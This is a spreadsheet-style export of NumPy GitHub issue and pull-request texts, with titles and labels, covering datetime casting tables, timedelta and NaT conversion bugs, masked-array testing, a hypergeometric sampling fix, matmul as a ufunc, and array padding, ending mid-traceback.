|M|:heavy_check_mark:|:heavy_check_mark:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|:x:|_x000D_
|W|:x:|:x:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|D|:x:|:x:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|h|:x:|:x:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|m|:x:|:x:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|s|:x:|:x:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|ms|:x:|:x:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|us|:x:|:x:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|ns|:x:|:x:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|ps|:x:|:x:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|fs|:x:|:x:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|as|:x:|:x:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
_x000D_
## unsafe_x000D_
| | Y | M | W | D | h | m | s | ms | us | ns | ps | fs | as|_x000D_
| ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  ---  |  --- |_x000D_
|Y|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|M|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|W|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|D|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|h|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|m|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|s|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|ms|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|us|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|ns|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|ps|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|fs|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|_x000D_
|as|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|:heavy_check_mark:|</t>
  </si>
  <si>
    <t>DOC: timedelta casting is unusual for casting='safe' and casting='same_kind'</t>
  </si>
  <si>
    <t>```python_x000D_
&gt;&gt;&gt; import datetime_x000D_
&gt;&gt;&gt; np.array(datetime.timedelta(seconds=20)).astype(np.timedelta64)_x000D_
TypeError: len() of unsized object_x000D_
```</t>
  </si>
  <si>
    <t>BUG: Cannot convert 0d object array to timedelta</t>
  </si>
  <si>
    <t>Fixes #11106. When guessing the `datetime` dtype, try `PyDateTime_DateTime` before `PyDateTime_Date`. Test for both cases added.</t>
  </si>
  <si>
    <t>BUG: guessing datetime, time precedence</t>
  </si>
  <si>
    <t>continuation of pr #11139, turn unused-function warning into an error when building for tests. Also move string padding to end since we prepend this to existing flags</t>
  </si>
  <si>
    <t>TST: make build warning into an error in runtest.py</t>
  </si>
  <si>
    <t xml:space="preserve">#### Code Sample, Creating a MaskedArray with missing data_x000D_
_x000D_
When the code showed below an exception is captured:_x000D_
**{ValueError}cannot convert float NaN to integer**_x000D_
_x000D_
```python_x000D_
# My current numpy version is_x000D_
np.__version___x000D_
#1.13.3_x000D_
_x000D_
MaskedArray(['2018-12-12', pd.NaT],mask=[False, True] ,dtype='datetime64[ns]', fill_value=None)_x000D_
```_x000D_
#### Problem description_x000D_
_x000D_
A MaskedArray needs to be created to insert to Database by using turbodbc module. That array contains missing values._x000D_
_x000D_
**Note**: The same behavior also applies to numpy arrays and when the fill_value is removed_x000D_
_x000D_
```python_x000D_
MaskedArray(['2018-12-12', pd.NaT],mask=[False, True] ,dtype='datetime64[ns]')_x000D_
```  _x000D_
_x000D_
**Note**: The error disappear when missed value is a None_x000D_
```python_x000D_
MaskedArray(['2018-12-12', None],mask=[False, True] ,dtype='datetime64[ns]')_x000D_
``` _x000D_
</t>
  </si>
  <si>
    <t>Numpy cannot convert pandas.NaT to a datetime64</t>
  </si>
  <si>
    <t>['53 - Invalid', '57 - Close?', 'component: numpy.datetime64']</t>
  </si>
  <si>
    <t>As discussed in the NEP sprint in March and proposed by @stefanv _x000D_
_x000D_
The first commit is PR #11145, so once that is accepted I will rebase.</t>
  </si>
  <si>
    <t>DOC: add a NEP to split MaskedArray into a separate package</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: NEP', 'component: numpy.ma']</t>
  </si>
  <si>
    <t>Small changes to NEP documentation creation_x000D_
- force python version as is done in main documentation creation_x000D_
- add a "Open NEPs" section for draft NEPs (like [python PEPs](https://www.python.org/dev/peps/))_x000D_
- move nep-0000 from `Draft`to `Active`, as detailed in the nep itself</t>
  </si>
  <si>
    <t>DOC: cleanup NEP creation</t>
  </si>
  <si>
    <t>['04 - Documentation', '58 - Ready for review', 'component: NEP']</t>
  </si>
  <si>
    <t xml:space="preserve">At https://docs.scipy.org/doc/numpy/user/basics.indexing.html, this sentence:_x000D_
_x000D_
&gt; Note that slices of arrays do not copy the internal array data but also produce new views of the original data._x000D_
_x000D_
does not make sense.  I think the word "also" should be deleted, then it becomes grammatical and technically correct._x000D_
</t>
  </si>
  <si>
    <t>doc unclear on slicing</t>
  </si>
  <si>
    <t xml:space="preserve">In `array2string` the prefix and suffix are **only** used to align/indent the lines following a newline in the string representation of the array, and are **not** included in the returned string as one would expect._x000D_
_x000D_
Eg:_x000D_
```_x000D_
a = np.array([0, 1])_x000D_
np.array2string(a, prefix='Array(', suffix=')') _x000D_
# Produces '[0 1]' not 'Array([0 1])' as expected_x000D_
```_x000D_
_x000D_
It would be useful to support prefix/suffix here for customized array printing without needing to subclass `np.ndarray`.  If, however, this is the intended/needed behaviour, it should be made clear in the documentation that the prefix and suffix are not printed._x000D_
</t>
  </si>
  <si>
    <t>Let `array2string` print prefix/suffix</t>
  </si>
  <si>
    <t>This makes it a little easier to tell the difference between the prepend and append functions (hint: it's not very much!)_x000D_
_x000D_
Last of the patches I have locally before I hand over to @lagru in #11126.</t>
  </si>
  <si>
    <t>MAINT: Extract a helper function for prepending and appending</t>
  </si>
  <si>
    <t>As mentioned in PR #10425, now that bionic has been released we should use it for testing</t>
  </si>
  <si>
    <t>MAINT: Update artful to bionic for i386 testing</t>
  </si>
  <si>
    <t>Travis tests add `-Werror` flags to the build process on linux, but these are not reflected in `runtests.py` when running tests locally. This PR copies the current flags from `test/travis-test.sh` to `runtests.py` (only if the compiler used is `gcc`)</t>
  </si>
  <si>
    <t>TST: turn some build warnings into errors</t>
  </si>
  <si>
    <t>The HRUA algorithm is described in Stadlober's thesis "Sampling from_x000D_
Poisson, binomial and hypergeometric distributions: ratio of uniforms_x000D_
as a simple and fast alternative."  The pseudo-code for the algorithm_x000D_
begins on page 82, where the parameter c is defined to be_x000D_
_x000D_
    c = sqrt((N - n)*n*p*q/(N - 1) + 1/2)_x000D_
_x000D_
`N` is the population size, `n` is the sample size, `p` = `M/N` is the_x000D_
fraction of the first type (i.e. the fraction of "good" values or_x000D_
successes) and `q` is `1 - p`._x000D_
_x000D_
The C code takes advantage of the symmetry and uses_x000D_
_x000D_
    m = min(sample, popsize - sample);_x000D_
_x000D_
as the sample size to be computed, where `popsize` is (not surprisingly)_x000D_
the population size (i.e. `good + bad`), and `sample` is the requested_x000D_
sample size._x000D_
_x000D_
The formula for `c` above is translated in the C code as_x000D_
_x000D_
    d7 = sqrt((double)(popsize - m) * sample * d4 * d5 / (popsize - 1) + 0.5);_x000D_
_x000D_
where `d4` and `d5` are `p` and `q`, resp._x000D_
_x000D_
The problem is that `sample` should have been replaced by `m` in that_x000D_
formula. It should be_x000D_
_x000D_
    d7 = sqrt((double)(popsize - m) * m * d4 * d5 / (popsize - 1) + 0.5);_x000D_
_x000D_
I haven't thoroughly analyzed the implications of this mistake.  It will_x000D_
only have an effect when `sample` is greater than half of `popsize`._x000D_
(When `sample` is less than or equal to half of `popsize`, `m == sample`.)_x000D_
A few tests of the expected values of the distribution don't show_x000D_
any obvious biases, but I haven't run it through a rigorous statistical_x000D_
testing procedure._x000D_
_x000D_
It appears that it simply means that the bound for the rejection_x000D_
method is too big, so the acceptance ratio of the method is much_x000D_
lower than it should be.  This can be seen in a test such as:_x000D_
_x000D_
    In [9]: %timeit np.random.hypergeometric(10, 190, 189, size=2500000)_x000D_
    2.07 s ± 1.25 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)_x000D_
_x000D_
    In [10]: %timeit np.random.hypergeometric(10, 190, 11, size=2500000)_x000D_
    1.14 s ± 1.42 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)_x000D_
_x000D_
Those two computations should take the same amount of time._x000D_
After the fixing the formula, they do:_x000D_
_x000D_
    In [4]: %timeit np.random.hypergeometric(10, 190, 189, size=2500000)_x000D_
    1.14 s ± 1.36 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)_x000D_
_x000D_
    In [5]: %timeit np.random.hypergeometric(10, 190, 11, size=2500000)_x000D_
    1.14 s ± 694 µs per loop (mean ± std. dev. of 7 runs, 1 loop each)</t>
  </si>
  <si>
    <t>BUG: random: Fix formula in rk_hypergeometric_hrua</t>
  </si>
  <si>
    <t>#10986 forgot to move to matrix tests from `np.ma` to `matrixlib`. This corrects it.</t>
  </si>
  <si>
    <t>MAINT: move remaining MaskedArray matrix tests to matrixlib.</t>
  </si>
  <si>
    <t xml:space="preserve">Since #5047 (v1.10) `vdot` does not work anymore on matrices._x000D_
_x000D_
 Examples:_x000D_
```python_x000D_
&gt;&gt;&gt; p=np.array([1,2,3])_x000D_
&gt;&gt;&gt; np.vdot(p,p)_x000D_
14_x000D_
&gt;&gt;&gt; np.vdot(np.matrix(p),np.matrix(p))_x000D_
matrix([[1]])_x000D_
&gt;&gt;&gt; np.vdot(np.matrix(p),p)_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
ValueError: vectors have different lengths_x000D_
```_x000D_
_x000D_
Older numpy versions return `14` in all cases. _x000D_
</t>
  </si>
  <si>
    <t>vdot does not work on matrices</t>
  </si>
  <si>
    <t>['06 - Regression', '57 - Close?', 'component: numpy.matrixlib']</t>
  </si>
  <si>
    <t>Clarify that tofile requires a file that can be directly written to_x000D_
and not a general file-like object</t>
  </si>
  <si>
    <t>DOC: Clarify tofile requirements</t>
  </si>
  <si>
    <t>The discussion of issue #9028 yielded two different possible directions for allowing `ndarray` subclasses to override `__matmul__` via `__array_ufunc__`. This is option 1 - allow a single `ufunc` `matmul` which will implement vector-vector, vector-matrix, matrix-vector, and matrix-matrix multiplication. In this PR, which builds on ~~PR #11132~~ PR #11175, the implementation of `matmul` is converted to a `ufunc`._x000D_
_x000D_
Note the pull request incorporates the changes from pr #11132 so the changesets are repeated_x000D_
_x000D_
What changed?_x000D_
- `matmul` is now implemented as a true `ufunc`, it appears in the `umath`'s `n_ops`, can be set and gotten using `PyArray_{G,S}etNumericOps`, and its loops are defined in `loops.c.src`_x000D_
- tests were expanded to reflect this change_x000D_
_x000D_
What is not finished?_x000D_
- ~~since I simply copied the partial loop implementation from `_umath_tests`, `matmul` cannot accept complex or half-float dtypes~~_x000D_
- ~~I wrote the code together with PR #11132 I probably have chages there that belong here and visa-versa~~_x000D_
- reuse the logic in `dot` to make this faster_x000D_
_x000D_
What is next?_x000D_
- ~~Get feedback on the relative merits of this approach vs. the one taken in PR #11061, where I produced a demi-`ufunc` with a wrapper function that can be used to convert any function into a `ufunc`.~~ The choice has been made, this approach wins._x000D_
_x000D_
Edit: update status</t>
  </si>
  <si>
    <t>WIP: ENH: Matmul as ufunc</t>
  </si>
  <si>
    <t>['01 - Enhancement', '15 - Discussion', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t>The discussion of issue #9028 yielded two different possible directions for allowing `ndarray` subclasses to override `__matmul__` via `__array_ufunc__`. This is option 1 - extend the core signature of a generalized `ufunc` to allow a single ufunc `matmul` which will implement vector-vector, vector-matrix, matrix-vector, and matrix-matrix multiplication. In this PR, the syntax of a signature is expanded to allow `(n?, k),(k, m?)-&gt;(n?, m?)` syntax, where the `?` means "this dimension is optional" [0],[1]. I also incorporated PR #5015 where signatures can have a fixed dimension `(3),(3)-&gt;(3)`._x000D_
_x000D_
**What changed?**_x000D_
- There is a change in the PyUFuncObject structure. I added two fields, and repurposed the unused field `reserved1` to become a `version` field for downstream consumers of the C-API._x000D_
- The parsing code during `ufunc` instantiation now parses the expanded signature_x000D_
- When calling a `ufunc` with flexible or fixed dimensions, extra checks are done to ensure consistency_x000D_
_x000D_
**What is yet to be done?**_x000D_
- The code needs cleanup and refactoring_x000D_
- Tests were added but there is a good chance I missed corner cases_x000D_
- I wrote the code together with the PR making `matmul` a true `ufunc`, I probably have chages there that belong here and visa-versa_x000D_
_x000D_
**What is next?**_x000D_
- Use this mechanism to make `matmul` a true `ufunc`_x000D_
- Get feedback on the relative merits of this approach vs. the one taken in PR #11061, where I produced a demi-`ufunc` with a wrapper function that can be used to convert any function into a `ufunc`._x000D_
_x000D_
[0]: Note that, following the [PEP for matrix multiplication](https://www.python.org/dev/peps/pep-0465/#semantics), there is no broadcasting over the optional dimensions, in the example given if the first operand has 2 or more dimensions, the second-to-the-last will be 'n', no `newaxis` will be inserted instead._x000D_
_x000D_
[1] The syntax '(n,k),(k,m)-&gt;(n,m);(n,k),(k)-&gt;(n);(k),(k,m)-&gt;(m);(k),(k)-&gt;()` was also considered and rejected as allowing too much flexibility in stacking alternate core signatures.</t>
  </si>
  <si>
    <t>WIP: ENH: Expand gufunc signature to allow flexible dimension specs</t>
  </si>
  <si>
    <t>['01 - Enhancement', '15 - Discussion']</t>
  </si>
  <si>
    <t>There are several functions for which I would like to see protocols constructed.  I've raised issues for #11074  and #11128 but these are just special cases of a much larger issue that includes many operations. The sense I've gotten is that the process to change numpy takes a while, so I'm inclined to find a catch-all solution that can serve as a catch-all while things evolve._x000D_
_x000D_
To that end I propose that duck-arrays include a method that returns a module that mimics the numpy namespace_x000D_
_x000D_
```python_x000D_
class ndarray:_x000D_
    def __array_module__(self):_x000D_
        import numpy as np_x000D_
        return np    _x000D_
_x000D_
class DaskArray:_x000D_
    def __array_module__(self):_x000D_
        import dask.array as da_x000D_
        return da_x000D_
        _x000D_
class CuPyArray:_x000D_
    def __array_module__(self):_x000D_
        import cupy as cp_x000D_
        return cp_x000D_
_x000D_
class SparseArray:_x000D_
    def __array_module__(self):_x000D_
        import sparse_x000D_
        return sparse_x000D_
..._x000D_
```_x000D_
_x000D_
Then, in various functions like stack or concatenate we check for these modules_x000D_
_x000D_
```python_x000D_
def stack(args, **kwargs):_x000D_
    modules = {arg.__array_module__() for arg in args}_x000D_
    if len(modules) == 1:_x000D_
        module = list(modules)[0]_x000D_
        if module != numpy:_x000D_
            return module.stack(args, **kwargs)_x000D_
    ..._x000D_
```_x000D_
_x000D_
There are likely several things wrong the implementation above, but my hope is that it gets a general point across that we'll dispatch wholesale to the module of the provided duck arrays.  _x000D_
    _x000D_
cc @shoyer @hameerabbasi @njsmith @ericmjl</t>
  </si>
  <si>
    <t>A catch-all protocol for numpy-like duck arrays</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'Proposal', 'component: numpy.core']</t>
  </si>
  <si>
    <t>The link to the [ctypes code fragment](https://pytools.codeplex.com/workitem/1627) on the [windows dll page](https://github.com/numpy/numpy/wiki/windows-dll-notes) does not work, as pytools has moved to [github](https://github.com/Microsoft/PTVS).</t>
  </si>
  <si>
    <t>ctypes code fragment link on dll notes page does not work</t>
  </si>
  <si>
    <t>Dear devs,_x000D_
_x000D_
As suggested here https://github.com/numpy/numpy/pull/11033#issuecomment-386039128 the current implementation of `numpy.pad` uses copies more than necessary. Currently most of the pad modes use `numpy.concatenate` under the hood to create the new array. This has to happen twice for each padded axis. I think it would be faster to pre-allocate the returned array once with the correct final shape and just set the appropriate edge values._x000D_
_x000D_
Here is a first draft of a function that would pre-allocate an array with padded shape and undefined content in the padded areas._x000D_
_x000D_
```python_x000D_
def _pad_empty(arr, pad_amt):_x000D_
    """Pad array with undefined values._x000D_
_x000D_
    Parameters_x000D_
    ----------_x000D_
    arr : ndarray_x000D_
        Array to grow._x000D_
    pad_amt : sequence of tuple[int, int]_x000D_
        Pad width on both sides for each dimension in `arr`._x000D_
_x000D_
    Returns_x000D_
    -------_x000D_
    padded : ndarray_x000D_
        Larger array with undefined values in padded areas._x000D_
    """_x000D_
    # Allocate grown array_x000D_
    new_shape = tuple(s + sum(p) for s, p in zip(arr.shape, pad_amt))_x000D_
    padded = np.empty(new_shape, dtype=arr.dtype)_x000D_
_x000D_
    # Copy old array into correct space_x000D_
    old_area = tuple(_x000D_
        slice(None if left == 0 else left, None if right == 0 else -right)_x000D_
        for left, right in pad_amt_x000D_
    )_x000D_
    padded[old_area] = arr_x000D_
_x000D_
    return padded_x000D_
``` _x000D_
_x000D_
These undefined pad-areas could then be filled by simple value assignment, e.g. with new `_set_const_after`, `_set_mean_before`... I think this would be significantly faster and I (kind of) tested this already with the suggested function `_fast_pad` in https://github.com/scikit-image/scikit-image/pull/3022._x000D_
_x000D_
If you like this idea, I'd be happy to make a PR that addresses this after #11012 is resolved one way or another. I'm looking forward to your feedback.</t>
  </si>
  <si>
    <t>ENH: Faster array padding</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: benchmarks', 'component: numpy.core']</t>
  </si>
  <si>
    <t>Hey,_x000D_
I think it would be worth to update the documentation with the changes of this pull request : https://github.com/numpy/numpy/pull/5822 where many distributions were allowed to have a scale parameter of 0 (see also this issue: https://github.com/numpy/numpy/issues/5818). One big reason is that if you rely on this behaviour your code is incompatible with numpy versions below 1.12.</t>
  </si>
  <si>
    <t>DOC: document that scale parameter can be 0 from numpy 1.12 on</t>
  </si>
  <si>
    <t>The underlying problem is that `ma.all()` evaluates to `masked` (see gh-11123), which is falsy, and thus triggers test failures._x000D_
_x000D_
p.s. This presumes that we are not going to change the documented behaviour of `MaskedArray.all()`...</t>
  </si>
  <si>
    <t>BUG: Ensure that fully masked arrays pass assert_array_equal.</t>
  </si>
  <si>
    <t>The removal of nan and inf from arrays that are compared using test routines like assert_array_equal treated the two arrays separately, which for masked arrays meant that some elements would not be removed when they should have been. This PR corrects this._x000D_
_x000D_
fixes #11121</t>
  </si>
  <si>
    <t>BUG,MAINT: Ensure masked elements can be tested against nan and inf.</t>
  </si>
  <si>
    <t>['00 - Bug', '03 - Maintenance', 'component: numpy.ma', 'component: numpy.testing']</t>
  </si>
  <si>
    <t xml:space="preserve">I get the following unexpected exception / test failure on linux (CentOS-6) and Windows but not on Mac.  This was driven by a CI failure that showed up for linux / windows but no on my local Mac version._x000D_
```_x000D_
In [62]: c = np.ma.MaskedArray([3.4, 4.1, 6.3], mask=[False, True, False])_x000D_
_x000D_
In [63]: np.testing.assert_array_almost_equal(c[:2], [3.4, np.nan])_x000D_
_x000D_
In [64]: np.testing.assert_array_almost_equal(c, [3.4, np.nan, 6.3])_x000D_
/export/tom/anaconda/envs/astropy/lib/python3.6/site-packages/numpy/core/arrayprint.py:686: UserWarning: Warning: converting a masked element to nan._x000D_
  s = self.format % x_x000D_
---------------------------------------------------------------------------_x000D_
ValueError                                Traceback (most recent call last)_x000D_
/export/tom/anaconda/envs/astropy/lib/python3.6/site-packages/numpy/testing/utils.py in assert_array_compare(comparison, x, y, err_msg, verbose, header, precision, equal_nan, equal_inf)_x000D_
    760 _x000D_
--&gt; 761         val = comparison(x, y)_x000D_
    762 _x000D_
_x000D_
/export/tom/anaconda/envs/astropy/lib/python3.6/site-packages/numpy/testing/utils.py in compare(x, y)_x000D_
    952         y = array(y, dtype=dtype, copy=False, subok=True)_x000D_
--&gt; 953         z = abs(x - y)_x000D_
    954 _x000D_
_x000D_
/export/tom/anaconda/envs/astropy/lib/python3.6/site-packages/numpy/ma/core.py in __sub__(self, other)_x000D_
   4078             return NotImplemented_x000D_
-&gt; 4079         return subtract(self, other)_x000D_
   4080 _x000D_
_x000D_
/export/tom/anaconda/envs/astropy/lib/python3.6/site-packages/numpy/ma/core.py in __call__(self, a, b, *args, **kwargs)_x000D_
   1045             np.seterr(divide='ignore', invalid='ignore')_x000D_
-&gt; 1046             result = self.f(da, db, *args, **kwargs)_x000D_
   1047         # Get the mask for the result_x000D_
_x000D_
ValueError: operands could not be broadcast together with shapes (3,) (2,) _x000D_
_x000D_
During handling of the above exception, another exception occurred:_x000D_
_x000D_
ValueError                                Traceback (most recent call last)_x000D_
&lt;ipython-input-64-2c7b42e22a4d&gt; in &lt;module&gt;()_x000D_
----&gt; 1 np.testing.assert_array_almost_equal(c, [3.4, np.nan, 6.3])_x000D_
_x000D_
/export/tom/anaconda/envs/astropy/lib/python3.6/site-packages/numpy/testing/utils.py in assert_array_almost_equal(x, y, decimal, err_msg, verbose)_x000D_
    960     assert_array_compare(compare, x, y, err_msg=err_msg, verbose=verbose,_x000D_
    961              header=('Arrays are not almost equal to %d decimals' % decimal),_x000D_
--&gt; 962              precision=decimal)_x000D_
    963 _x000D_
    964 _x000D_
_x000D_
/export/tom/anaconda/envs/astropy/lib/python3.6/site-packages/numpy/testing/utils.py in assert_array_compare(comparison, x, y, err_msg, verbose, header, precision, equal_nan, equal_inf)_x000D_
    784         msg = build_err_msg([x, y], err_msg, verbose=verbose, header=header,_x000D_
    785                             names=('x', 'y'), precision=precision)_x000D_
--&gt; 786         raise ValueError(msg)_x000D_
    787 _x000D_
    788 _x000D_
_x000D_
ValueError: _x000D_
error during assertion:_x000D_
_x000D_
Traceback (most recent call last):_x000D_
  File "/export/tom/anaconda/envs/astropy/lib/python3.6/site-packages/numpy/testing/utils.py", line 761, in assert_array_compare_x000D_
    val = comparison(x, y)_x000D_
  File "/export/tom/anaconda/envs/astropy/lib/python3.6/site-packages/numpy/testing/utils.py", line 953, in compare_x000D_
    z = abs(x - y)_x000D_
  File "/export/tom/anaconda/envs/astropy/lib/python3.6/site-packages/numpy/ma/core.py", line 4079, in __sub___x000D_
    return subtract(self, other)_x000D_
  File "/export/tom/anaconda/envs/astropy/lib/python3.6/site-packages/numpy/ma/core.py", line 1046, in __call___x000D_
    result = self.f(da, db, *args, **kwargs)_x000D_
ValueError: operands could not be broadcast together with shapes (3,) (2,) _x000D_
_x000D_
_x000D_
Arrays are not almost equal to 6 decimals_x000D_
 x: MaskedArray([ 3.4,  nan,  6.3])_x000D_
 y: array([ 3.4,  6.3])_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>Incorrect behavior of np.testing.assert_array_almost_equal on linux, windows</t>
  </si>
  <si>
    <t>['05 - Testing', 'component: numpy.matrixlib', 'component: numpy.testing']</t>
  </si>
  <si>
    <t>Trivial cleanups found while investigating the `shrink` argument</t>
  </si>
  <si>
    <t>MAINT: remove redundant code in `MaskedArray.__new__`</t>
  </si>
  <si>
    <t>Sample console output:_x000D_
```_x000D_
In [1]: from ctypes import c_wchar_x000D_
_x000D_
In [2]: x = c_wchar * 3_x000D_
_x000D_
In [3]: np.array(x())_x000D_
---------------------------------------------------------------------------_x000D_
ValueError                                Traceback (most recent call last)_x000D_
~\Repos\numeric-python\numpy\build\testenv\Lib\site-packages\numpy\core\_internal.py in _dtype_from_pep3118(spec)_x000D_
    486_x000D_
--&gt; 487     dtype, align = __dtype_from_pep3118(stream, is_subdtype=False)_x000D_
    488     return dtype_x000D_
_x000D_
~\Repos\numeric-python\numpy\build\testenv\Lib\site-packages\numpy\core\_internal.py in __dtype_from_pep3118(stream, is_subdtype)_x000D_
    558         else:_x000D_
--&gt; 559             raise ValueError("Unknown PEP 3118 data type specifier %r" % stream.s)_x000D_
    560_x000D_
_x000D_
ValueError: Unknown PEP 3118 data type specifier 'u'_x000D_
_x000D_
The above exception was the direct cause of the following exception:_x000D_
_x000D_
ValueError                                Traceback (most recent call last)_x000D_
&lt;ipython-input-3-f8a17df3aa24&gt; in &lt;module&gt;()_x000D_
----&gt; 1 np.array(x())_x000D_
_x000D_
ValueError: '&lt;u' is not a valid PEP 3118 buffer format string_x000D_
```</t>
  </si>
  <si>
    <t>ENH: Chain exceptions to give better error messages for invalid PEP3118 format strings</t>
  </si>
  <si>
    <t>Typo fix in variable name in core/numeric/binary_repr/warn_if_insufficient.</t>
  </si>
  <si>
    <t>BUG: Typo in variable name in binary_repr</t>
  </si>
  <si>
    <t xml:space="preserve">See: https://travis-ci.org/MacPython/numpy-wheels/jobs/380655687_x000D_
_x000D_
```_x000D_
________________ TestNewBufferProtocol.test_error_too_many_dims _________________x000D_
_x000D_
